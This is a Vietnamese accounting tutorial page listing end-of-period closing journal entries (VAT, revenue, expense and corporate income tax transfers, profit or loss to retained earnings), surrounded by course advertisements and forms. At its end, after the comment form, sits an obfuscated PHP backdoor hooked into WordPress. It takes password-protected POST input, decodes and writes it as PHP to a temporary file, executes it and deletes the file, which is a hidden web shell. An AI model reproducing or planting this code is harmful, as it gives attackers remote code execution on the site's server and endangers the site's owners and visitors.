1

BÚT TOÁN KẾT CHUYỂN CUỐI KỲ CÁC LOẠI HÌNH DOANH NGHIỆP

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Kế Toán Hà Nội tham khảo và chia sẻ lại cho các chị em nhà kế về: BÚT TOÁN KẾT CHUYỂN CUỐI KỲ CÁC LOẠI HÌNH DOANH NGHIỆP 

 
I. Bút toán kết chuyển lỗ lãi đầu năm
1. Nếu năm trước lỗ
Nợ TK 4211
Có TK 4212
2.Nếu năm trước lãi
Nợ TK 4212
Có TK 4211
II. Các bút toán kết chuyển cuối kỳ
1. Kết chuyển thuế GTGT theo quý, tháng
A. Bút toán kết chuyển thuế
Nợ TK 33311
Có TK 1331
B. Bút toán nộp tiền thuế ( nếu 33311 dư có )
Nợ TK 33311
Có TK 111;112
2.Kết chuyển các khoản giảm trừ doanh thu ( Nếu có )
Nợ TK 511
Có Tk 521
3.Kết chuyển doanh thu thuần trong kỳ
Nợ TK 511
Có TK 911
4.Kết chuyển doanh thu hoạt động tài chính
Nợ TK 515
Có TK 911
5. Kết chuyển chi phí tài chính
Nợ TK 911
Có TK 635
6.Kết chuyển giá vốn xuất bán trong kì
Nợ TK 911
Có TK 632
7. Kết chuyển chi phí bán hàng
Nợ TK 911
Có TK 6421
8. Kết chuyển chi phí quản lý
Nợ TK 911
Có TK 6422
9. Kết chuyển chi phí khác (nếu có)
Nợ TK 911
Có TK 811
10. Kết chuyển thu nhập khác (nếu có)
Nợ TK 711
Có TK 911
11. Tạm tính thuế TNDN trong kỳ nếu có lãi
Nợ TK 821
Có TK 3334
√ Khi nộp thuế TNDN ngân sách
Nợ TK 3334
Có TK 1111,1121
√ Nếu số thuế thu nhập doanh nghiệp thực tế phải nộp trong năm trên tờ khai quyết toán mẫu 03/TNDN nhỏ hơn số thuế thu nhập doanh nghiệp tạm phải nộp, kế toán ghi giảm chi phí thuế thu nhập doanh nghiệp hiện hành, ghi:
Nợ TK 3334 – Thuế thu nhập doanh nghiệp
Có TK 8211 – Chi phí thuế thu nhập doanh nghiệp hiện hành.
12. Kết chuyển chi phí Thuế TNDN Phát sinh trong kỳ(nếu có) (Thực hiện cuối năm tài chính)
Nợ Tk 911
Có Tk 821
13. Bút toán kết chuyển lãi lỗ
Xác định chi phí thuế TNDN hiện hành theo công thức:
Thuế TNDN = Thu nhập tính thuế x thuế suất thuế TNDN
Thu nhập tính thuế = Lợi nhuận kế toán trước thuế + Chi phí không được trừ theo luật thuế – Các khoản lỗ năm trước – Thu nhập miễn thuế
Trong đó: LNKTTT= Doanh thu – Chi phí
(Nếu như Lợi nhuận kế toán trước thuế + chi phí không được trừ – TN miễn thuế < 0 –> Lỗ –> Doanh nghiệp không phải nộp thuế TNDN).
14. Kết chuyển chi phí thuế TNDN hiện hành
TK 8211 vào TK 911: xác định lợi nhuận chưa phân phối
15. Nếu Doanh thu > Chi phí –> Lãi,
Kế toán hạch toán lợi nhuận chưa phân phối, ghi:
Nợ TK 911 – Xác định kết quả kinh doanh
Có TK 4212
16. Nếu Doanh thu < Chi phí –> Lỗ,
Kế toán hạch toán lợi nhuận chưa phân phối, ghi:
Nợ TK 4212
Có TK 911 – Xác định kết quả kinh doanh
Lưu ý: Sau khi thực hiện bút toán kết chuyển doanh thu và chi phí xác định kết quả kinh doanh trên tài khoản từ loại 5 đến tài khoản loại 9 Tổng số phát sinh bên Nợ và Tổng số phát sinh bên Có bằng nhau –> Tài khoản từ loại 5 đến loại 9 không còn số dư cuối kỳ.
 

 

– Chuyên cung cấp khóa HỌC KẾ TOÁN THỰC HÀNH THỰC CHIẾN ĐỂ RA NGHỀ ĐI LÀM NGAY
– Dạy nâng cao để thành thạo kế toán tổng hợp. Dạy kèm riêng 1-1 kế toán theo mọi nhu cầu
– Dịch vụ kế toán cho các công ty giá rẻ uy tín
– Hotline 0973.761.751 (Inbox Zalo)

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}